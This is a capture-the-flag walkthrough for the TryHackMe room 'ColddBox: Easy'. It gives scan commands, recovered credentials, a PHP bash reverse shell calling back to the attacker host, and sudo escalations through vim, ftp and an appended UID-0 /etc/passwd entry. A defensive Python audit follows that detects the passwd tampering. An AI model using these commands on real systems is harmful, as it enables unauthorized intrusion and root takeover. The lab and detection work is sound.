ColddBox: Easy
Room Link: https://tryhackme.com/room/colddboxeasy
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
port 4512 found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali
wpscan --url http://$VICTIM/ --enumerate u
Username: c0ldd
Password: 9876543210
Reverse Shell
revshell code
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>
Kali
nc -lvnp 443
Then just go to a page that doesn't exist; in this case p=1 existed but p=2 did not.


Victim
cat /var/www/html/wp-config.php
TCP/4512 - SSH
Victim
ssh c0ldd@$VICTIM -p 4512
Password: cybersecurity
Privilege Escalation Option 1 - VIM
Victim
sudo -l
sudo vim -c ':!/bin/sh'
Privilege Escalation Option 2 - FTP
Victim
sudo ftp
!/bin/sh
Privilege Escalation Option 3 - chmod
Victim
ls -lah /etc/passwd
LFILE=/etc/passwd
sudo chmod 6777 $LFILE
ls -lah /etc/passwd
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
Victim
su new
Password: 123
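Seen from the defender's side, Option 3 leaves two kinds of evidence: permission bits on /etc/passwd that differ from the usual 0644, and an appended entry with UID 0 and a hash in the password field. The audit below is an added example, not part of the original walkthrough; its function names and the c0ldd sample entry (UID 1000) are assumptions made for illustration.

```python
import os
import stat

# Password-field values meaning "no usable hash stored in /etc/passwd itself".
NO_HASH = {"x", "*", "!", "!!"}

def audit_entries(lines):
    """Flag passwd(5) lines with UID 0 on a non-root name, or a hash/empty password inline."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed", line))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((lineno, "uid0-non-root", name))
        if password == "":
            findings.append((lineno, "empty-password", name))
        elif password not in NO_HASH:
            findings.append((lineno, "inline-hash", name))
    return findings

def mode_findings(mode):
    """Flag permission bits that should never be set on /etc/passwd (expected 0644)."""
    found = []
    if mode & (stat.S_ISUID | stat.S_ISGID):
        found.append("setuid-or-setgid")
    if mode & stat.S_IWGRP:
        found.append("group-writable")
    if mode & stat.S_IWOTH:
        found.append("world-writable")
    return found

def audit_file(path="/etc/passwd"):
    """Audit a passwd file on disk: permission bits plus every entry."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path, encoding="utf-8", errors="replace") as fh:
        return mode_findings(mode), audit_entries(fh)

# Constructed sample: two ordinary entries plus the line appended in Option 3.
SAMPLE = [
    "root:x:0:0:root:/root:/bin/bash",
    "c0ldd:x:1000:1000::/home/c0ldd:/bin/bash",
    "new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash",
]

if __name__ == "__main__":
    print(mode_findings(0o6777), audit_entries(SAMPLE))
```

Running audit_file() from a scheduled job and alerting on any non-empty result catches both the chmod and the appended account.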